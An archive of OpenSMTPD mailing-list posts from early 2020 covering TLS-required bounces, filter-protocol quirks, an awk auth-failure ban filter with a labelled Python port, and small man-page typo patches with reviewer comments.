I am using OpenSMTPD 6.6.0 on OpenBSD 6.6 stable

Currently I’m using the tls-require option in order to get mandatory 
TLS on outgoing mail, but with that follows the normal time-out values 
regarding bounce intervals.
Because of greylisting, I’m not sure that adjusting these time-out 
values is the best way around this problem.


I have tested the scenario with a mailserver which is unable to use 
TLS, by sending mail to mailnesia.com .
This gives the expected result - "mta event=error reason=TLS required 
but not supported by remote host” in the maillog.


My mailserver recognizes when it is unable to continue the 
delivery due to a configuration setting on my mailserver.
But instead of bouncing the mail immediately, it is queued anyway for 
later delivery.



Is it possible to enforce outgoing mail to always use TLS - and bounce 
more or less immediately,
if the sending mailserver registers that the receiving mailserver is 
unable to meet our requirements regarding TLS?




Kind regards

Søren Aurehøj




I guess you could try adding to smtpd.conf:

bounce warn-interval 1s

Edgar


Re: Subject prefixing

2020-02-13 Thread Edgar Pettijohn

On Feb 13, 2020 2:01 PM, Ionel GARDAIS  wrote:
>
> Hi list,
>
> I'm looking for an easy way to add a static prefix "[*EXT*]" to all incoming emails, as long as the subject does not already contain this string.
> OpenSMTPD is running as a filtering MX running senderscore filter.
> default action is relay to another host.
>
> Can OpenSMTPD modify the header conditionally ?
A filter could be written to do this.
> If so, should I add a filter to the existing "listen" line or should I add a new "listen" line with a dedicated filter and chaining listen->action relay to local listen->action relay to external ?
If you used a separate listen directive, it would have to be on a different port.
>
> Thanks,
> Ionel
>
>



logging

2020-02-07 Thread Edgar Pettijohn
I'm curious with the advent of the `report/filter' interface. Will there 
be the possibility of disabling syslog logging in the future? I was 
thinking of writing a script to "log" in xml for easy parsing/pretty 
printing the logs. The only drawback I see is doubling the disk usage.


I suppose I could use tmux and do a `smtpd -d >/dev/null 2>&1' Just not 
sure if there would be any side effects.


Thanks,


Edgar




Re: filter bug?

2020-02-01 Thread Edgar Pettijohn




On 02/01/20 11:08, Reio Remma wrote:

Hello!

The token|session id in v0.4 of the filter protocol were swapped to 
the more sensible session id|token order in v0.5. I believe the docs 
are still being worked on and will apply to the v0.5 protocol.




Thought I was going crazy. I was reading docs for .5 and testing on a 
system running .4 so as usual the fault lies with myself.


Thanks!

Edgar

For example filter-rspamd was recently updated to work with both 
versions, switching the argument order as needed.


Good luck,
Reio

On 01.02.2020 4:18, Edgar Pettijohn wrote:
Not sure if it's a documentation bug or not, but smtpd-filters.7 
states the following:


 For all phases, excepted "data-line", the responses must follow the same
 construct, a message type "filter-result", followed by the unique session
 id, the opaque token, a decision and optional decision-specific
 parameters:

filter-result|7641df9771b4ed00|1ef1c203cc576e5d|proceed
filter-result|7641df9771b4ed00|1ef1c203cc576e5d|reject|550 nope

For my filter I had to send:

            filter-result|$token|$sid|proceed

It also shows the following for connect:

 connect: rdns fcrdns src dest
 This request is emitted after connection, before the banner is
 displayed.

I'm only seeing 9 fields though and expected 11.

mail$ uname -a
OpenBSD mail.pettijohn-web.com 6.6 GENERIC#4 amd64

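# Not thoroughly tested, but if you want to use it pretend there is the ISC
# license here.

#!/usr/bin/awk -f

# Quote a string for /bin/sh so that session data (for example the AUTH
# username) cannot be interpreted by the shell that system() starts.
function shquote(s) {
    gsub(/'/, "'\\''", s)
    return "'" s "'"
}

function logit(msg) {
    system("logger -p mail.info " shquote(msg))
}

function die(msg) {
    system("logger -p mail.err -s " shquote(msg))
    exit 1
}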

BEGIN {
    ARGC = 0
    FS = "|"
    OFS = FS
    version = 0.4
    allowed = 3
    logit("filter-authban: starting...")
}

"config|ready" == $0 {
    print "register|report|smtp-in|link-connect"
    print "register|report|smtp-in|link-disconnect"
    print "register|report|smtp-in|link-auth"
    print "register|filter|smtp-in|connect"
    print "register|ready"
    next
}

"link-connect" == $5 {
    if (NF < 10)
        die("invalid input for link-connect")
    if ($2 != version)
        die("version mismatch")
    sid = $6
    src = $9

    state[sid] = src
}

"link-auth" == $5 {
    if (NF < 8)
        die("invalid input for link-auth")
    if ($2 != version)
        die("version mismatch")
    sid = $6
    user = $7
    result = $8

    if (state[sid]) {
        split(state[sid], ip, ":")
        addr = ip[1]
        if (result == "fail") {
            logit("auth failure for " user " from " addr)
            state[addr] += 1
        }
        if (state[addr] >= allowed)
            banned[addr] = 1
    }
}

"link-disconnect" == $5 {
    if (NF < 6)
        die("invalid input for link-disconnect")
    if ($2 != version)
        die("version mismatch")
    sid = $6

    delete state[sid]
}

"connect" == $5 {
    if ($2 != version)
        die("version mismatch")
    sid = $6
    token = $7
    src = $9

    if (banned[src]) {
        logit("rejecting connection from: " src)
        print "filter-result|" token "|" sid "|reject|550 go away"
    } else {
        print "filter-result|" token "|" sid "|proceed"
    }
}

END {
    logit("filter-authban: stopping...")
}

Thanks,


Edgar
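
Added example (not part of the original posts and not code from the OpenSMTPD project): the auth-ban logic of the awk filter above in Python, with the filter-result id order chosen from the protocol version, no shell call for logging, and an explicit flush after every answer. Field positions are assumed from the awk filter in this thread, the 9-field and 11-field connect layouts are inferred from the message above, and every session id, token and address used with it is constructed.

```python
#!/usr/bin/env python3
"""Added example: auth-failure ban filter for the OpenSMTPD filter protocol.

Field positions follow the awk filter posted in this thread (an assumption
for any other protocol version).
"""
import sys

FAIL_LIMIT = 3  # same threshold as "allowed" in the awk filter


def host_of(src):
    """Drop a trailing :port from 'ip:port' or '[v6]:port'; keep bare addresses."""
    if src.startswith("[") and "]" in src:
        return src[1:src.index("]")]
    if src.count(":") == 1:
        return src.split(":", 1)[0]
    return src  # bare IPv4, bare IPv6, or a local socket name


def filter_result(version, sid, token, decision, param=None):
    """Build a filter-result line with the id order the given version expects."""
    ver = tuple(int(part) for part in version.split("."))
    # v0.4 wants token|session id; v0.5 swapped this to session id|token.
    ids = [token, sid] if ver < (0, 5) else [sid, token]
    fields = ["filter-result"] + ids + [decision]
    if param is not None:
        fields.append(param)
    return "|".join(fields)


class AuthBan:
    def __init__(self, limit=FAIL_LIMIT):
        self.limit = limit
        self.sessions = {}  # session id -> client address
        self.failures = {}  # client address -> failed AUTH count

    def handle(self, line):
        """Return the lines to send back to smtpd for one input line."""
        line = line.rstrip("\r\n")
        if line == "config|ready":
            return ["register|report|smtp-in|link-connect",
                    "register|report|smtp-in|link-disconnect",
                    "register|report|smtp-in|link-auth",
                    "register|filter|smtp-in|connect",
                    "register|ready"]
        f = line.split("|")
        if len(f) < 6 or f[0] not in ("report", "filter"):
            return []  # config|key|value lines and anything unknown
        kind, version, event, sid = f[0], f[1], f[4], f[5]
        if kind == "report":
            self._report(event, sid, f)
            return []  # report events never get an answer
        if event == "connect" and len(f) >= 9:
            token = f[6]
            # Assumed layouts: 11 fields = rdns|fcrdns|src|dest,
            # 9 fields = src is the last field (as in the awk filter).
            src = host_of(f[9] if len(f) >= 11 else f[8])
            if self.failures.get(src, 0) >= self.limit:
                return [filter_result(version, sid, token,
                                      "reject", "550 go away")]
            return [filter_result(version, sid, token, "proceed")]
        return []

    def _report(self, event, sid, f):
        if event == "link-connect" and len(f) >= 10:
            self.sessions[sid] = host_of(f[8])
        elif event == "link-auth" and len(f) >= 8:
            addr = self.sessions.get(sid)
            # The result is the last field, so a "|" typed into the username
            # cannot shift it out of place.
            if addr is not None and f[-1] == "fail":
                self.failures[addr] = self.failures.get(addr, 0) + 1
        elif event == "link-disconnect":
            self.sessions.pop(sid, None)


def main():
    ban = AuthBan()
    for line in sys.stdin:
        for out in ban.handle(line):
            sys.stdout.write(out + "\n")  # LF only, never "\r\n"
        sys.stdout.flush()  # stdout is a pipe here, so flush every time


if __name__ == "__main__":
    main()
```
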










filter bug?

2020-01-31 Thread Edgar Pettijohn
Not sure if it's a documentation bug or not, but smtpd-filters.7 states 
the following:


 For all phases, excepted "data-line", the responses must follow the same
 construct, a message type "filter-result", followed by the unique session
 id, the opaque token, a decision and optional decision-specific
 parameters:

filter-result|7641df9771b4ed00|1ef1c203cc576e5d|proceed
filter-result|7641df9771b4ed00|1ef1c203cc576e5d|reject|550 nope

For my filter I had to send:

            filter-result|$token|$sid|proceed

It also shows the following for connect:

 connect: rdns fcrdns src dest
 This request is emitted after connection, before the banner is
 displayed.

I'm only seeing 9 fields though and expected 11.

mail$ uname -a
OpenBSD mail.pettijohn-web.com 6.6 GENERIC#4 amd64

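# Not thoroughly tested, but if you want to use it pretend there is the ISC
# license here.

#!/usr/bin/awk -f

# Quote a string for /bin/sh so that session data (for example the AUTH
# username) cannot be interpreted by the shell that system() starts.
function shquote(s) {
    gsub(/'/, "'\\''", s)
    return "'" s "'"
}

function logit(msg) {
    system("logger -p mail.info " shquote(msg))
}

function die(msg) {
    system("logger -p mail.err -s " shquote(msg))
    exit 1
}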

BEGIN {
    ARGC = 0
    FS = "|"
    OFS = FS
    version = 0.4
    allowed = 3
    logit("filter-authban: starting...")
}

"config|ready" == $0 {
    print "register|report|smtp-in|link-connect"
    print "register|report|smtp-in|link-disconnect"
    print "register|report|smtp-in|link-auth"
    print "register|filter|smtp-in|connect"
    print "register|ready"
    next
}

"link-connect" == $5 {
    if (NF < 10)
        die("invalid input for link-connect")
    if ($2 != version)
        die("version mismatch")
    sid = $6
    src = $9

    state[sid] = src
}

"link-auth" == $5 {
    if (NF < 8)
        die("invalid input for link-auth")
    if ($2 != version)
        die("version mismatch")
    sid = $6
    user = $7
    result = $8

    if (state[sid]) {
        split(state[sid], ip, ":")
        addr = ip[1]
        if (result == "fail") {
            logit("auth failure for " user " from " addr)
            state[addr] += 1
        }
        if (state[addr] >= allowed)
            banned[addr] = 1
    }
}

"link-disconnect" == $5 {
    if (NF < 6)
        die("invalid input for link-disconnect")
    if ($2 != version)
        die("version mismatch")
    sid = $6

    delete state[sid]
}

"connect" == $5 {
    if ($2 != version)
        die("version mismatch")
    sid = $6
    token = $7
    src = $9

    if (banned[src]) {
        logit("rejecting connection from: " src)
        print "filter-result|" token "|" sid "|reject|550 go away"
    } else {
        print "filter-result|" token "|" sid "|proceed"
    }
}

END {
    logit("filter-authban: stopping...")
}

Thanks,


Edgar




Re: filter oddities

2020-01-29 Thread Edgar Pettijohn




On 01/25/20 16:14, Edgar Pettijohn wrote:



On 01/25/20 14:48, Edgar Pettijohn wrote:



On 01/25/20 14:24, gil...@poolp.org wrote:
January 25, 2020 9:21 PM, "Edgar Pettijohn" 
 wrote:



On 01/25/20 14:20, gil...@poolp.org wrote:

January 25, 2020 8:50 PM, "Edgar Pettijohn" 
 wrote:


I haven't seen any mention of this, but for some reason in my limited
"testing" of filters I have to use \r\n in my responses to smtpd. Is this
normal? Doesn't seem to be documented and what filters I've looked at
don't appear to be using \r\n.

Indeed, you must certainly NOT use "\r\n" in filters.

For example without ORS = "\r\n" the following script will cause smtpd to
basically just hang. There are no errors reported, but when I attempt to
telnet localhost 25 the daemon doesn't greet me.

After adding ORS = "\r\n" everything works as expected.
I'm not familiar with awk beyond very basic uses, could this be due to some
flushing not happening by default and which gets triggered with "\r\n" ?

Adding:

setvbuf(stdout, NULL, _IONBUF, 0);

to awk's main() fixes it on my laptop. Still don't understand how my 
laptop is apparently the only device affected...


At least I can continue testing on my laptop anyway.

Edgar



Re: smtpd-filters.7 patch

2020-01-26 Thread Edgar Pettijohn

Missed a typo "s/strenght/strength/"


On 01/25/20 14:12, Edgar Pettijohn wrote:



On 01/25/20 14:08, gil...@poolp.org wrote:

The diff reads ok but I wonder why you removed this sentence:

-No decision is ever taken by the report stream.

I think it made it a bit more clear that reporting is informative only.


I felt that the line stating it was a one-way stream covered it. 
Mainly it just made me stumble on the line and have to reread it a 
couple of times.


Edgar



diff --git a/smtpd/smtpd-filters.7 b/smtpd/smtpd-filters.7
index 1e1a27ef..bf563174 100644
--- a/smtpd/smtpd-filters.7
+++ b/smtpd/smtpd-filters.7
@@ -89,22 +89,21 @@ to inform
 in real-time about events that are occurring in the daemon.
 The report events do not expect an answer from
 .Nm ,
-it is just meant to provide them with informations.
+it is just meant to provide them with information.
 A filter should be able to replicate the
 .Xr smtpd 8
-state for a session by gathering informations coming from report events.
-No decision is ever taken by the report stream.
+state for a session by gathering information coming from report events.
 .Pp
 The filter stream is a two-way stream which allows
 .Xr smtpd 8
 to query
 .Nm
 about what it should do with a session at a given phase.
-The filter requests expects an answer from
+The filter requests expect an answer from
 .Nm ,
 .Xr smtpd 8
 will not let the session move forward until then.
-A decision must always be taken by the filter stream.
+A decision must always be made by the filter stream.
 .Pp
 It is sometimes possible to rely on filter requests to gather information,
 but because a reponse is expected by
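Review bot: the last context line of this hunk still reads "but because a reponse is expected by"; as the patch is a spelling and grammar pass over exactly this paragraph, "reponse" should become "response" in the same change rather than being left for a follow-up.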
@@ -112,13 +111,13 @@ but because a reponse is expected by
 this is more costly than using report events.
 The correct pattern for writing filters is to use the report events to
 create a local state for a session,
-then use filter requests to take decisions based on this state.
+then use filter requests to make decisions based on this state.
 The only case when using filter request instead of report events is correct,
 is when a decision is required for the filter request and there is no need for
 more information than that of the event.
 .Sh PROTOCOL
 The protocol is straightforward,
-it consists of a human-readable line exchanges between
+it consists of human-readable line exchanges between
 .Nm
 and
 .Xr smtpd 8
@@ -165,7 +164,7 @@ will be documented in the sections below.
 .Sh CONFIGURATION
 During the initial handshake,
 .Xr smtpd 8
-will emit a serie of configuration keys and values.
+will emit a series of configuration keys and values.
 The list is meant to be ignored by
 .Nm
 that do not require it and consumed gracefully by filters that do.
@@ -265,7 +264,7 @@ This event is generated upon successful negotiation of TLS.
 .Pp
 .Ar tls-string
 contains a colon-separated list of TLS properties including the TLS version,
-the cipher suite used by the session and the cipher strenght in bits.
+the cipher suite used by the session and the cipher strength in bits.
 .It Ic link-disconnect
 This event is generated upon disconnection of the client.
 .It Ic link-auth : Ar username Ar result
@@ -514,7 +513,7 @@ 
filter|0.5|1576146008.006103|smtp-in|data-line|7641df9771b4ed00|1ef1c203cc576e5d
 
filter|0.5|1576146008.006105|smtp-in|data-line|7641df9771b4ed00|1ef1c203cc576e5d|.
 .Ed
 .Pp
-They are expected to produce an output stream similarly terminate by a single
+They are expected to produce an output stream similarly terminated by a single
 dot.
 A filter may inject,
 suppress,
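Review bot: the header of this hunk and its first context lines arrived wrapped: "@@ -514,7 +513,7 @@" ends in a bare space, the two "filter|0.5|...|data-line|..." lines start in column one, and a line holding only a space sits between them. The hunk therefore no longer matches the seven lines of context it declares and will be rejected on apply; resend with line wrapping disabled in the mail client, or attach the diff.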


Re: filter oddities

2020-01-26 Thread Edgar Pettijohn




On 01/26/20 01:01, Edgar Pettijohn wrote:

On Jan 26, 2020 12:11 AM, Martijn van Duren  
wrote:

On 1/25/20 8:50 PM, Edgar Pettijohn wrote:

I haven't seen any mention of this, but for some reason in my limited
"testing" of filters I have to use \r\n in my responses to smtpd. Is
this normal? Doesn't seem to be documented and what filters I've looked
at don't appear to be using \r\n.


For example without ORS = "\r\n" the following script will cause smtpd
to basically just hang. There are no errors reported, but when I attempt
to telnet localhost 25 the daemon doesn't greet me. After adding ORS =
"\r\n" everything works as expected.

#!/usr/bin/awk -f
BEGIN {
       ARGC = 0
       FS = "|"
       OFS = FS
       ORS = "\r\n"
}

"config|ready" == $0 {
       print "register|report|smtp-in|*"
       print "register|ready"
       print $0 >> "/tmp/report.txt"
       next
}

"config" == $1 {
       next
}

"report" == $1 {
       print $0 >> "/tmp/report.txt"
       next
}



I tried both your awk script without ORS and perl script on an
OpenBSD-current machine and both work as expected. So either there's
something weird in -portable or there's something weird with your
setup.

I don't have a NetBSD machine at hand, so could you provide me shell-
access to a machine that can reproduce this problem? I can probably
take a look at it in the coming week.

Will do. I'll spin one up and get it ready for you tomorrow hopefully.

Thanks,

Edgar


Must be a local issue to my laptop. I spun up a server at vultr and got 
everything ready. Then tested and it works both with and without the 
/r/n. I don't understand what the difference is between my laptop and 
the server. Either way it appears to be resolved.


Thanks,

Edgar



Re: filter oddities

2020-01-25 Thread Edgar Pettijohn




On 01/25/20 14:48, Edgar Pettijohn wrote:



On 01/25/20 14:24, gil...@poolp.org wrote:
January 25, 2020 9:21 PM, "Edgar Pettijohn"  
wrote:



On 01/25/20 14:20, gil...@poolp.org wrote:

January 25, 2020 8:50 PM, "Edgar Pettijohn" 
 wrote:


I haven't seen any mention of this, but for some reason in my limited
"testing" of filters I have to use \r\n in my responses to smtpd. Is this
normal? Doesn't seem to be documented and what filters I've looked at
don't appear to be using \r\n.

Indeed, you must certainly NOT use "\r\n" in filters.

For example without ORS = "\r\n" the following script will cause smtpd to
basically just hang. There are no errors reported, but when I attempt to
telnet localhost 25 the daemon doesn't greet me.

After adding ORS = "\r\n" everything works as expected.
I'm not familiar with awk beyond very basic uses, could this be due to some
flushing not happening by default and which gets triggered with "\r\n" ?


This is another awk filter which doesn't use ORS:

https://github.com/jirutka/opensmtpd-filter-rewrite-from/blob/master/filter-rewrite-from 



so I'm not sure why yours blocks but the solution is not with "\r\n"
for sure

I get the same with filter-rewrite-from.

Can you run filter traces while you reproduce ?


Doesn't seem to do much.

laptop$ telnet localhost 25
Trying ::1...
Connected to localhost.
Escape character is '^]'.

laptop$ sudo smtpd -dv -T filters
debug: init ssl-tree
debug: init ca-tree
debug: init ssl-tree
debug: using "fs" queue backend
debug: using "ramqueue" scheduler backend
debug: using "ram" stat backend
info: OpenSMTPD 6.6.1-portable starting
debug: init ssl-tree
debug: init ssl-tree
debug: init ssl-tree
debug: init ca-tree
debug: init ca-tree
debug: init ssl-tree
debug: init ssl-tree
debug: using "fs" queue backend
debug: using "fs" queue backend
debug: using "ramqueue" scheduler backend
debug: using "ramqueue" scheduler backend
debug: using "ram" stat backend
debug: using "ram" stat backend
setup_peer: control -> klondike[6603] fd=5
setup_peer: lookup -> control[18573] fd=5
setup_peer: control -> lookup[27107] fd=6
setup_peer: lookup -> pony express[16452] fd=6
setup_peer: control -> pony express[16452] fd=7
setup_peer: lookup -> queue[4582] fd=7
setup_peer: control -> queue[4582] fd=8
setup_peer: control -> scheduler[28554] fd=9
debug: init ssl-tree
debug: init ca-tree
debug: init ssl-tree
debug: using "fs" queue backend
debug: using "ramqueue" scheduler backend
debug: using "ram" stat backend
setup_peer: klondike -> control[18573] fd=5
setup_peer: klondike -> pony express[16452] fd=6
debug: init ca-tree
setup_done: ca[6603] done
setup_proc: klondike done
setup_proc: control done
setup_done: control[18573] done
debug: init ssl-tree
setup_proc: lookup done
setup_done: lka[27107] done
debug: using "fs" queue backend
debug: using "ramqueue" scheduler backend
debug: using "ram" stat backend
setup_peer: pony express -> control[18573] fd=5
filters init type=proc, name=filter-perl, proc=filter-perl
setup_peer: pony express -> klondike[6603] fd=6
setup_peer: pony express -> lookup[27107] fd=7
setup_peer: pony express -> queue[4582] fd=8
setup_done: pony[16452] done
setup_proc: pony express done
debug: rsa_engine_init: using RSA privsep engine
debug: ecdsa_engine_init: using ECDSA privsep engine
debug: init ssl-tree
debug: init ca-tree
debug: init ssl-tree
debug: using "fs" queue backend
debug: using "ramqueue" scheduler backend
debug: using "ram" stat backend
debug: init ssl-tree
debug: init ca-tree
debug: init ssl-tree
debug: using "fs" queue backend
debug: using "ramqueue" scheduler backend
debug: using "ram" stat backend
setup_peer: scheduler -> control[18573] fd=5
setup_peer: queue -> control[18573] fd=5
setup_peer: scheduler -> queue[4582] fd=6
setup_peer: queue -> pony express[16452] fd=6
setup_peer: queue -> lookup[27107] fd=7
setup_peer: queue -> scheduler[28554] fd=8
setup_proc: queue done
setup_done: queue[4582] done
setup_proc: scheduler done
debug: bounce warning after 4h
setup_done: scheduler[28554] done
smtpd: setup done
debug: parent_send_config_ruleset: reloading
debug: parent_send_config: configuring pony process
debug: parent_send_config: configuring ca process
debug: init private ssl-tree
debug: smtp: listen on 127.0.0.1 port 25 flags 0x2400 pki "" ca ""
debug: smtp: listen on [::1] port 25 flags 0x2400 pki "" ca ""
debug: smtp: listen on [fe80::1%lo0] port 25 flags 0x2400 pki "" ca ""
debug: smtp: will accept at most 1697 clients
debug: queue: done loading queue into scheduler
debug: smtpd: scanning offline queue...
debug: sm

Re: filter oddities

2020-01-25 Thread Edgar Pettijohn




On 01/25/20 14:24, gil...@poolp.org wrote:

January 25, 2020 9:21 PM, "Edgar Pettijohn"  wrote:


On 01/25/20 14:20, gil...@poolp.org wrote:


January 25, 2020 8:50 PM, "Edgar Pettijohn"  wrote:


I haven't seen any mention of this, but for some reason in my limited "testing" 
of filters I have
to use \r\n in my responses to smtpd. Is this normal? Doesn't seem to be 
documented and what
filters I've looked at don't appear to be using \r\n.

Indeed, you must certainly NOT use "\r\n" in filters.


For example without ORS = "\r\n" the following script will cause smtpd to 
basically just hang.
There are no errors reported, but when I attempt to telnet localhost 25 the 
daemon doesn't greet me.
After adding ORS = "\r\n" everything works as expected.

I'm not familiar with awk beyond very basic uses, could this be due to some
flushing not happening by default and which gets triggered with "\r\n" ?

This is another awk filter which doesn't use ORS:

https://github.com/jirutka/opensmtpd-filter-rewrite-from/blob/master/filter-rewrite-from

so I'm not sure why yours blocks but the solution is not with "\r\n" for sure

I get the same with filter-rewrite-from.

Can you run filter traces while you reproduce ?


Doesn't seem to do much.

laptop$ telnet localhost 25
Trying ::1...
Connected to localhost.
Escape character is '^]'.

laptop$ sudo smtpd -dv -T filters
debug: init ssl-tree
debug: init ca-tree
debug: init ssl-tree
debug: using "fs" queue backend
debug: using "ramqueue" scheduler backend
debug: using "ram" stat backend
info: OpenSMTPD 6.6.1-portable starting
debug: init ssl-tree
debug: init ssl-tree
debug: init ssl-tree
debug: init ca-tree
debug: init ca-tree
debug: init ssl-tree
debug: init ssl-tree
debug: using "fs" queue backend
debug: using "fs" queue backend
debug: using "ramqueue" scheduler backend
debug: using "ramqueue" scheduler backend
debug: using "ram" stat backend
debug: using "ram" stat backend
setup_peer: control -> klondike[6603] fd=5
setup_peer: lookup -> control[18573] fd=5
setup_peer: control -> lookup[27107] fd=6
setup_peer: lookup -> pony express[16452] fd=6
setup_peer: control -> pony express[16452] fd=7
setup_peer: lookup -> queue[4582] fd=7
setup_peer: control -> queue[4582] fd=8
setup_peer: control -> scheduler[28554] fd=9
debug: init ssl-tree
debug: init ca-tree
debug: init ssl-tree
debug: using "fs" queue backend
debug: using "ramqueue" scheduler backend
debug: using "ram" stat backend
setup_peer: klondike -> control[18573] fd=5
setup_peer: klondike -> pony express[16452] fd=6
debug: init ca-tree
setup_done: ca[6603] done
setup_proc: klondike done
setup_proc: control done
setup_done: control[18573] done
debug: init ssl-tree
setup_proc: lookup done
setup_done: lka[27107] done
debug: using "fs" queue backend
debug: using "ramqueue" scheduler backend
debug: using "ram" stat backend
setup_peer: pony express -> control[18573] fd=5
filters init type=proc, name=filter-perl, proc=filter-perl
setup_peer: pony express -> klondike[6603] fd=6
setup_peer: pony express -> lookup[27107] fd=7
setup_peer: pony express -> queue[4582] fd=8
setup_done: pony[16452] done
setup_proc: pony express done
debug: rsa_engine_init: using RSA privsep engine
debug: ecdsa_engine_init: using ECDSA privsep engine
debug: init ssl-tree
debug: init ca-tree
debug: init ssl-tree
debug: using "fs" queue backend
debug: using "ramqueue" scheduler backend
debug: using "ram" stat backend
debug: init ssl-tree
debug: init ca-tree
debug: init ssl-tree
debug: using "fs" queue backend
debug: using "ramqueue" scheduler backend
debug: using "ram" stat backend
setup_peer: scheduler -> control[18573] fd=5
setup_peer: queue -> control[18573] fd=5
setup_peer: scheduler -> queue[4582] fd=6
setup_peer: queue -> pony express[16452] fd=6
setup_peer: queue -> lookup[27107] fd=7
setup_peer: queue -> scheduler[28554] fd=8
setup_proc: queue done
setup_done: queue[4582] done
setup_proc: scheduler done
debug: bounce warning after 4h
setup_done: scheduler[28554] done
smtpd: setup done
debug: parent_send_config_ruleset: reloading
debug: parent_send_config: configuring pony process
debug: parent_send_config: configuring ca process
debug: init private ssl-tree
debug: smtp: listen on 127.0.0.1 port 25 flags 0x2400 pki "" ca ""
debug: smtp: listen on [::1] port 25 flags 0x2400 pki "" ca ""
debug: smtp: listen on [fe80::1%lo0] port 25 flags 0x2400 pki "" ca ""
debug: smtp: will accept at most 1697 clients
debug: queue: done loading queue into scheduler
debug: smtpd: scanning offline queue...
debug: smtpd: offline scanning done

I also have the same 

Re: filter oddities

2020-01-25 Thread Edgar Pettijohn




On 01/25/20 14:20, gil...@poolp.org wrote:

January 25, 2020 8:50 PM, "Edgar Pettijohn"  wrote:


I haven't seen any mention of this, but for some reason in my limited "testing" 
of filters I have
to use \r\n in my responses to smtpd. Is this normal? Doesn't seem to be 
documented and what
filters I've looked at don't appear to be using \r\n.


Indeed, you must certainly NOT use "\r\n" in filters.



For example without ORS = "\r\n" the following script will cause smtpd to 
basically just hang.
There are no errors reported, but when I attempt to telnet localhost 25 the 
daemon doesn't greet me.
After adding ORS = "\r\n" everything works as expected.


I'm not familiar with awk beyond very basic uses, could this be due to some
flushing not happening by default and which gets triggered with "\r\n" ?

This is another awk filter which doesn't use ORS:

https://github.com/jirutka/opensmtpd-filter-rewrite-from/blob/master/filter-rewrite-from

so I'm not sure why yours blocks but the solution is not with "\r\n" for sure

I get the same with filter-rewrite-from.



Re: smtpd-filters.7 patch

2020-01-25 Thread Edgar Pettijohn




On 01/25/20 14:08, gil...@poolp.org wrote:

The diff reads ok but I wonder why you removed this sentence:

-No decision is ever taken by the report stream.

I think it made it a bit more clear that reporting is informative only.


I felt that the line stating it was a one-way stream covered it. Mainly 
it just made me stumble on the line and have to reread it a couple of times.


Edgar



filter oddities

2020-01-25 Thread Edgar Pettijohn
I haven't seen any mention of this, but for some reason in my limited 
"testing" of filters I have to use \r\n in my responses to smtpd. Is 
this normal? Doesn't seem to be documented and what filters I've looked 
at don't appear to be using \r\n.



For example without ORS = "\r\n" the following script will cause smtpd 
to basically just hang. There are no errors reported, but when I attempt 
to telnet localhost 25 the daemon doesn't greet me. After adding ORS = 
"\r\n" everything works as expected.


#!/usr/bin/awk -f
BEGIN {
    ARGC = 0
    FS = "|"
    OFS = FS
    ORS = "\r\n"
}

"config|ready" == $0 {
    print "register|report|smtp-in|*"
    print "register|ready"
    print $0 >> "/tmp/report.txt"
    next
}

"config" == $1 {
    next
}

"report" == $1 {
    print $0 >> "/tmp/report.txt"
    next
}




smtpd-filters.7 patch

2020-01-25 Thread Edgar Pettijohn


diff --git a/smtpd/smtpd-filters.7 b/smtpd/smtpd-filters.7
index 1e1a27ef..3cdb10e1 100644
--- a/smtpd/smtpd-filters.7
+++ b/smtpd/smtpd-filters.7
@@ -89,22 +89,21 @@ to inform
 in real-time about events that are occurring in the daemon.
 The report events do not expect an answer from
 .Nm ,
-it is just meant to provide them with informations.
+it is just meant to provide them with information.
 A filter should be able to replicate the
 .Xr smtpd 8
-state for a session by gathering informations coming from report events.
-No decision is ever taken by the report stream.
+state for a session by gathering information coming from report events.
 .Pp
 The filter stream is a two-way stream which allows
 .Xr smtpd 8
 to query
 .Nm
 about what it should do with a session at a given phase.
-The filter requests expects an answer from
+The filter requests expect an answer from
 .Nm ,
 .Xr smtpd 8
 will not let the session move forward until then.
-A decision must always be taken by the filter stream.
+A decision must always be made by the filter stream.
 .Pp
 It is sometimes possible to rely on filter requests to gather information,
 but because a reponse is expected by
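Review bot: the deletion of "No decision is ever taken by the report stream." is the one change in this hunk that alters content rather than spelling, and nothing in the submission explains it. If the sentence only read badly, reword it ("No decision is ever made by the report stream.") so that the informational nature of report events stays stated next to the filter-stream paragraph, which says a decision must always be made.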
@@ -112,13 +111,13 @@ but because a reponse is expected by
 this is more costly than using report events.
 The correct pattern for writing filters is to use the report events to
 create a local state for a session,
-then use filter requests to take decisions based on this state.
+then use filter requests to make decisions based on this state.
 The only case when using filter request instead of report events is correct,
 is when a decision is required for the filter request and there is no need for
 more information than that of the event.
 .Sh PROTOCOL
 The protocol is straightforward,
-it consists of a human-readable line exchanges between
+it consists of human-readable line exchanges between
 .Nm
 and
 .Xr smtpd 8
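Review bot: the unchanged sentence "The only case when using filter request instead of report events is correct, is when ..." in this hunk keeps the singular "filter request" and a comma between subject and verb, directly below a line the patch already rewrites. Consider fixing it in the same pass, for example "Using a filter request instead of report events is only correct when ...".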
@@ -165,7 +164,7 @@ will be documented in the sections below.
 .Sh CONFIGURATION
 During the initial handshake,
 .Xr smtpd 8
-will emit a serie of configuration keys and values.
+will emit a series of configuration keys and values.
 The list is meant to be ignored by
 .Nm
 that do not require it and consumed gracefully by filters that do.
@@ -514,7 +513,7 @@ 
filter|0.5|1576146008.006103|smtp-in|data-line|7641df9771b4ed00|1ef1c203cc576e5d
 
filter|0.5|1576146008.006105|smtp-in|data-line|7641df9771b4ed00|1ef1c203cc576e5d|.
 .Ed
 .Pp
-They are expected to produce an output stream similarly terminate by a single
+They are expected to produce an output stream similarly terminated by a single
 dot.
 A filter may inject,
 suppress,


netbsd fails without /etc/mailname

2020-01-19 Thread Edgar Pettijohn
Just built a fresh git checkout. The configure make and install all went 
smoothly. However, now I have to have an /etc/mailname file or it gets 
stuck in config_default(). Specifically the following line from 
getmailname():



error = getaddrinfo(hostname, NULL, , );


It just hangs there until I ^C.


Edgar




netbsd makefile issue

2020-01-19 Thread Edgar Pettijohn

Had to do the following for `make uninstall'

$ for file in `find . -name Makefile`
> do
> sed -i 's/\/bin\/true/\/usr\/bin\/true/g' $file
> done
$ sudo make uninstall

Edgar




Re: Skip recipient verification and forward everything to a LMTP socket

2020-01-18 Thread Edgar Pettijohn

On Jan 18, 2020 2:45 PM, gil...@poolp.org wrote:
>
> January 15, 2020 6:03 PM, "Éloi Rivard"  wrote:
>
> > Hi,
> > 
> > I would like to put a OpenSMTPD server in front of a sourcehut lists
> > installation [1] (that is, a mailing list system for sourcehut).
> > OpenSMTPD and sourcehut communicate through a lmtp unix socket. Here is
> > my configuration (without the filter and pki parts):
> > 
> > listen on eth0 tls pki lists.forge.mydomain.tld
> > action sourcehut lmtp /tmp/lists.forge.mydomain-tld-lmtp.sock
> > 
> > match from any for domain "lists.forge.yaal.fr" action "sourcehut"
